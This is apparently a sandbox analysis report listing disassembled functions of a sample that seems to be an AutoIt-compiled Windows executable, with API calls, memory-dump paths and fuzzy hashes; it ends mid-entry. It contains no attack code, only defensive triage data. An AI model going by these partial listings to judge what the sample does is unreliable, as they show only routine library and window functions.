                                    • Instruction Fuzzy Hash: B4318131600118AFEF10AF64CC85BBE77A9FF45764F048129FE06E7291DB70AD549BA2
                                    Function 008DF65E Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 90COMMON
                                    Download Yara Rule
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                    • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: __wcsnicmp
                                    • String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
                                    • API String ID: 1038674560-2734436370
                                    • Opcode ID: 1bd7dc0e5cb0cd8f8c1b7e983120026e4ccbd0dad1feb9d0181561d86046359f
                                    • Instruction ID: 386ad67f19a955ae6ccd192a4e807924caf2fabb26d7c76f8c0ac987e37554de
                                    • Opcode Fuzzy Hash: 1bd7dc0e5cb0cd8f8c1b7e983120026e4ccbd0dad1feb9d0181561d86046359f
                                    • Instruction Fuzzy Hash: 4621457220415166E321BA38AC02EE77398FF66358B14413BFA43C6692EB509D91E396
                                    Function 008DDBC4 Relevance: 10.6, APIs: 7, Instructions: 90memoryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 008DDC09
                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 008DDC2F
                                    • SysAllocString.OLEAUT32(00000000), ref: 008DDC32
                                    • SysAllocString.OLEAUT32 ref: 008DDC53
                                    • SysFreeString.OLEAUT32 ref: 008DDC5C
                                    • StringFromGUID2.COMBASE(?,?,00000028), ref: 008DDC76
                                    • SysAllocString.OLEAUT32(?), ref: 008DDC84
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                    • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                    • String ID:
                                    • API String ID: 3761583154-0
                                    • Opcode ID: 08e5980bd631f6052886c174eb98b7cb7adfae3915c1bfbdcad2e9c7ab3a3246
                                    • Instruction ID: ac8eac4b06a1f84408fb7a666c477787104afd1c11ab68c0f4b6b13decba2ec7
                                    • Opcode Fuzzy Hash: 08e5980bd631f6052886c174eb98b7cb7adfae3915c1bfbdcad2e9c7ab3a3246
                                    • Instruction Fuzzy Hash: 6E213275618204AFDB20DBA8DC88DAB77ACFB09360B108226F915CB761D674DD41DB64
                                    Function 009075CD Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 75windowCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 00881D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00881D73
                                      • Part of subcall function 00881D35: GetStockObject.GDI32(00000011), ref: 00881D87
                                      • Part of subcall function 00881D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00881D91
                                    • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00907632
                                    • SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 0090763F
                                    • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 0090764A
                                    • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00907659
                                    • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 00907665
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                    • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: MessageSend$CreateObjectStockWindow
                                    • String ID: Msctls_Progress32
                                    • API String ID: 1025951953-3636473452
                                    • Opcode ID: 842c65c3e4004d9a3bb53f9a9460f1527f9be4687e597551c25505323dadc341
                                    • Instruction ID: ba59136d0cefd84ab6c41c9646758ca0a4c35b77813c2585949f6877f6981df0
                                    • Opcode Fuzzy Hash: 842c65c3e4004d9a3bb53f9a9460f1527f9be4687e597551c25505323dadc341
                                    • Instruction Fuzzy Hash: D811B9B15101197FEF115FA4CC85EE7BF5DEF08798F014114B605A2090C672AC21DBA4
                                    Function 008A9AE6 Relevance: 10.5, APIs: 7, Instructions: 45threadCOMMON
                                    Download Yara Rule
                                    APIs
                                    • __init_pointers.LIBCMT ref: 008A9AE6
                                      • Part of subcall function 008A3187: RtlEncodePointer.NTDLL(00000000), ref: 008A318A
                                      • Part of subcall function 008A3187: __initp_misc_winsig.LIBCMT ref: 008A31A5
                                      • Part of subcall function 008A3187: GetModuleHandleW.KERNEL32(kernel32.dll), ref: 008A9EA0
                                      • Part of subcall function 008A3187: GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 008A9EB4
                                      • Part of subcall function 008A3187: GetProcAddress.KERNEL32(00000000,FlsFree), ref: 008A9EC7
                                      • Part of subcall function 008A3187: GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 008A9EDA
                                      • Part of subcall function 008A3187: GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 008A9EED
                                      • Part of subcall function 008A3187: GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 008A9F00
                                      • Part of subcall function 008A3187: GetProcAddress.KERNEL32(00000000,CreateEventExW), ref: 008A9F13
                                      • Part of subcall function 008A3187: GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 008A9F26
                                      • Part of subcall function 008A3187: GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 008A9F39
                                      • Part of subcall function 008A3187: GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 008A9F4C
                                      • Part of subcall function 008A3187: GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 008A9F5F
                                      • Part of subcall function 008A3187: GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 008A9F72
                                      • Part of subcall function 008A3187: GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 008A9F85
                                      • Part of subcall function 008A3187: GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 008A9F98
                                      • Part of subcall function 008A3187: GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 008A9FAB
                                      • Part of subcall function 008A3187: GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 008A9FBE
                                    • __mtinitlocks.LIBCMT ref: 008A9AEB
                                    • __mtterm.LIBCMT ref: 008A9AF4
                                      • Part of subcall function 008A9B5C: RtlDeleteCriticalSection.NTDLL(00000000), ref: 008A9C56
                                      • Part of subcall function 008A9B5C: _free.LIBCMT ref: 008A9C5D
                                      • Part of subcall function 008A9B5C: RtlDeleteCriticalSection.NTDLL(0093EC00), ref: 008A9C7F
                                    • __calloc_crt.LIBCMT ref: 008A9B19
                                    • __initptd.LIBCMT ref: 008A9B3B
                                    • GetCurrentThreadId.KERNEL32 ref: 008A9B42
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                    • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: AddressProc$CriticalDeleteSection$CurrentEncodeHandleModulePointerThread__calloc_crt__init_pointers__initp_misc_winsig__initptd__mtinitlocks__mtterm_free
                                    • String ID:
                                    • API String ID: 3567560977-0
                                    • Opcode ID: a964ca21974354fccbe87f35e8b3e63966ab7e6125012ee3c41359d039d0337b
                                    • Instruction ID: 475be646f5d72fb8d82451898073d630523e9edf6465d395b6e75abb7f2ac83f
                                    • Opcode Fuzzy Hash: a964ca21974354fccbe87f35e8b3e63966ab7e6125012ee3c41359d039d0337b
                                    • Instruction Fuzzy Hash: 8DF06D3251D7215AF734B67CBC0364A3690FB03730B214A2AF4E5C59D2EF60944245A2
                                    Function 008A406B Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 19libraryloaderCOMMONLIBRARYCODE
                                    Download Yara Rule
                                    APIs
                                    • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,008A3F85), ref: 008A4085
                                    • GetProcAddress.KERNEL32(00000000), ref: 008A408C
                                    • RtlEncodePointer.NTDLL(00000000), ref: 008A4097
                                    • RtlDecodePointer.NTDLL(008A3F85), ref: 008A40B2
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                    • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
                                    • String ID: RoUninitialize$combase.dll
                                    • API String ID: 3489934621-2819208100
                                    • Opcode ID: 50566ac1e8fea92afe89b8911c71debe9c8f9b71daec846c3d6d79a1557cb8a0
                                    • Instruction ID: 6918b99f76c18453375650ee0036b34a655bbbe5249d1d03b8c2b99ec4f99453
                                    • Opcode Fuzzy Hash: 50566ac1e8fea92afe89b8911c71debe9c8f9b71daec846c3d6d79a1557cb8a0
                                    • Instruction Fuzzy Hash: C6E092786AD700EFEB60AF71ED1AB453AA4B74A786F109024F111E58A0CBB64644FB14
                                    Function 008F6B76 Relevance: 9.2, APIs: 6, Instructions: 212COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                    • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 6b189b47de8413556861a5eddaff62eefa4b25f099830299e6cb0665a61b72b0
                                    • Instruction ID: a5e12ef34d1a6bc84f5f9cc9122ae17e8b11d55c1b35052827240694d0121091
                                    • Opcode Fuzzy Hash: 6b189b47de8413556861a5eddaff62eefa4b25f099830299e6cb0665a61b72b0
                                    • Instruction Fuzzy Hash: DA619D71208205ABD710FB28DC82E7BB7A8FF84714F544A19F696DB292EB719D04C752
                                    Function 008E64B8 Relevance: 9.2, APIs: 6, Instructions: 205COMMON
                                    Download Yara Rule
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                    • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: _memmove$__itow__swprintf
                                    • String ID:
                                    • API String ID: 3253778849-0
                                    • Opcode ID: 252363474222daa7ffc5f90582436cd049655afb3bfa590e9cf2d97247ad03e5
                                    • Instruction ID: ded6fef1deb4911a089b49dea4f2acdd985ad2e4e7e4174a87ba0acc2586f65b
                                    • Opcode Fuzzy Hash: 252363474222daa7ffc5f90582436cd049655afb3bfa590e9cf2d97247ad03e5
                                    • Instruction Fuzzy Hash: FA619D3050029A9BDF01FF69CC81AFE37A5FF16308F044529F8599B1A2EA35D815DB52
                                    Function 009001E4 Relevance: 9.2, APIs: 6, Instructions: 167registryCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 00887DE1: _memmove.LIBCMT ref: 00887E22
                                      • Part of subcall function 00900E1A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,008FFDAD,?,?), ref: 00900E31
                                    • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 009002BD
                                    • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 009002FD
                                    • RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 00900320
                                    • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 00900349
                                    • RegCloseKey.ADVAPI32(?,?,00000000), ref: 0090038C
                                    • RegCloseKey.ADVAPI32(00000000), ref: 00900399
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                    • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: Close$BuffCharConnectEnumOpenRegistryUpperValue_memmove
                                    • String ID:
                                    • API String ID: 4046560759-0
                                    • Opcode ID: b61436a3b07055a0e0fc7fce59d03abcacf465d7113ddd971e496d357bea9a83
                                    • Instruction ID: 2ae3911ded128bec99c6bc4e8a63590596659c81ceb32a84642085fcb9cff64b
                                    • Opcode Fuzzy Hash: b61436a3b07055a0e0fc7fce59d03abcacf465d7113ddd971e496d357bea9a83
                                    • Instruction Fuzzy Hash: 4A515731208204AFCB15EF68D885E6EBBF9FF89314F04492DF595872A2DB31E905DB52
                                    Function 00905799 Relevance: 9.2, APIs: 6, Instructions: 160windowCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetMenu.USER32(?), ref: 009057FB
                                    • GetMenuItemCount.USER32(00000000), ref: 00905832
                                    • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 0090585A
                                    • GetMenuItemID.USER32(?,?), ref: 009058C9
                                    • GetSubMenu.USER32(?,?), ref: 009058D7
                                    • PostMessageW.USER32(?,00000111,?,00000000), ref: 00905928
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                    • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: Menu$Item$CountMessagePostString
                                    • String ID:
                                    • API String ID: 650687236-0
                                    • Opcode ID: 5e2d90d40dc05cae6fb66d3313c874cd69cc9996502425a330f3356c8e4fd7d9
                                    • Instruction ID: 72ce652a765c2514af48dad0abc447a95e2541d2e08c5b2b504380fcc2bb18b0
                                    • Opcode Fuzzy Hash: 5e2d90d40dc05cae6fb66d3313c874cd69cc9996502425a330f3356c8e4fd7d9
                                    • Instruction Fuzzy Hash: 23515A35A00615EFCF11AF68C845AAEB7B4FF48320F158069EC56AB391CB34AE419F91
                                    Function 008DEEEC Relevance: 9.2, APIs: 6, Instructions: 159COMMON
                                    Download Yara Rule
                                    APIs
                                    • VariantInit.OLEAUT32(?), ref: 008DEF06
                                    • VariantClear.OLEAUT32(00000013), ref: 008DEF78
                                    • VariantClear.OLEAUT32(00000000), ref: 008DEFD3
                                    • _memmove.LIBCMT ref: 008DEFFD
                                    • VariantClear.OLEAUT32(?), ref: 008DF04A
                                    • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 008DF078
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                    • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: Variant$Clear$ChangeInitType_memmove
                                    • String ID:
                                    • API String ID: 1101466143-0
                                    • Opcode ID: 299746681ca80abfecefcb9f87ff61cb98c68d995f8a56db0b1d18360ab1aac6
                                    • Instruction ID: aa75fdfd4c1da1353955da21b055e46bc734742e781186b0f76eed7e096842b5
                                    • Opcode Fuzzy Hash: 299746681ca80abfecefcb9f87ff61cb98c68d995f8a56db0b1d18360ab1aac6
                                    • Instruction Fuzzy Hash: 3D515CB5A00209DFDB14DF58C884AAAB7B8FF4C314B15856AEE59DB301E735E911CBA0
                                    Function 008E220A Relevance: 9.1, APIs: 6, Instructions: 138windowCOMMON
                                    Download Yara Rule
                                    APIs
                                    • _memset.LIBCMT ref: 008E2258
                                    • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 008E22A3
                                    • IsMenu.USER32(00000000), ref: 008E22C3
                                    • CreatePopupMenu.USER32 ref: 008E22F7
                                    • GetMenuItemCount.USER32(000000FF), ref: 008E2355
                                    • InsertMenuItemW.USER32(00000000,?,00000001,00000030), ref: 008E2386
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                    • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: Menu$Item$CountCreateInfoInsertPopup_memset
                                    • String ID:
                                    • API String ID: 3311875123-0
                                    • Opcode ID: 190ea18e37b38799b7a1a78de091952d225a98776b543ce2c742fe90b2b6a46c
                                    • Instruction ID: 52844118774bccf09b70be315584af40d148cd4d225a239af52b4c1e269945db
                                    • Opcode Fuzzy Hash: 190ea18e37b38799b7a1a78de091952d225a98776b543ce2c742fe90b2b6a46c
                                    • Instruction Fuzzy Hash: E6518B70600289DFDF21CF6AC888BAEBBE9FF46318F144169E815D72A1D3749A44CF51
                                    Function 00881765 Relevance: 9.1, APIs: 6, Instructions: 113COMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 00882612: GetWindowLongW.USER32(?,000000EB), ref: 00882623
                                    • BeginPaint.USER32(?,?,?,?,?,?), ref: 0088179A
                                    • GetWindowRect.USER32(?,?), ref: 008817FE
                                    • ScreenToClient.USER32(?,?), ref: 0088181B
                                    • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 0088182C
                                    • EndPaint.USER32(?,?), ref: 00881876
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                    • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: PaintWindow$BeginClientLongRectScreenViewport
                                    • String ID:
                                    • API String ID: 1827037458-0
                                    • Opcode ID: a86e56e085b41ce08ae0431d7fd9329629d279a0392f6e615176fb6f8586425e
                                    • Instruction ID: 93078968fa0a063f5dd3d315fcffd42d4ade4be8fc81137e4638b01581214a73
                                    • Opcode Fuzzy Hash: a86e56e085b41ce08ae0431d7fd9329629d279a0392f6e615176fb6f8586425e
                                    • Instruction Fuzzy Hash: C841A3301047049FDB10EF64CC89FA67BECFB4A724F040639F564C62A2CB719946EB62
                                    Function 0090B69E Relevance: 9.1, APIs: 6, Instructions: 109windowCOMMON
                                    Download Yara Rule
                                    APIs
                                    • ShowWindow.USER32(009457B0,00000000,01562660,?,?,009457B0,?,0090B5A8,?,?), ref: 0090B712
                                    • EnableWindow.USER32(00000000,00000000), ref: 0090B736
                                    • ShowWindow.USER32(009457B0,00000000,01562660,?,?,009457B0,?,0090B5A8,?,?), ref: 0090B796
                                    • ShowWindow.USER32(00000000,00000004,?,0090B5A8,?,?), ref: 0090B7A8
                                    • EnableWindow.USER32(00000000,00000001), ref: 0090B7CC
                                    • SendMessageW.USER32(?,0000130C,?,00000000), ref: 0090B7EF
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                    • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: Window$Show$Enable$MessageSend
                                    • String ID:
                                    • API String ID: 642888154-0
                                    • Opcode ID: 90ab693c7abe81b2fd9a64eec182ed1a4fd0259cd70e1d50dc61269124c4c525
                                    • Instruction ID: 3d8ec3f4ca37a5a9e57d5b0ca547cca502df04f80b88506f10faed95295d0222
